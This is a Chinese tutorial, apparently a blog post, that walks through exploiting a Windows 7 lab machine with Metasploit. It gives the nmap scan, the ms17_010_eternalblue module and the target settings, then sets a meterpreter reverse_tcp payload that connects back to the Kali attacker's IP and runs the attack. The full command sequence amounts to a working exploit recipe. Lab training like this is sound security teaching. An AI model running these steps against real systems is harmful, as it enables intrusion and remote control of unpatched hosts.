由于mesploit框架十分巨大,我把它分为了三个部分:漏洞利用,木马利用,后渗透阶段。
metaspliot简介
metaspliot是一个漏洞框架,全称为The Metasploit Framework,简称为MSF。
流程需求
- kali攻击机 192.168.3.26
- windows 7靶机 192.168.3.28
实例演示
1.使用nmap进行扫描
使用nmap进行SYN扫描,得到目标开放的端口、端口服务的版本信息以及操作系统版本。
nmap -sS -sV -O 192.168.3.28
2.使用search命令搜索攻击模块
图中我们可以看到目标445端口是开放状态,而445端口典型漏洞就是ms17_010,我们使用search命令进行搜索可用的攻击模块。
3.使用use调用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
4.设置攻击参数
运行命令"show options"。(rhosts 代表目标主机IP地址,rport代表目标主机端口)
设置目标主机IP地址
set rhosts 192.168.3.28
5.选择攻击所使用的payload
运行命令"show payloads" ,查看metasploit集成的payload。
在选择攻击payload时,建议使用和meterpreter和reverse相关的payload。(meterpreter在metasploit中有着瑞士军刀的称号)
选择我们要使用的payload。
set payload windows/x64/meterpreter/reverse_tcp
查看payload的配置信息
show options
设置回连IP地址。(即本机IP地址)
set lhost 192.168.3.26
6.渗透攻击
在完成所有配置信息时,我们再次运行"show options"检验配置是否正确。
检验正确后,然后执行命令"run"。
到这里就完成了mesploit漏洞利用的介绍,如果想了解更多的Kali工具,请关注我!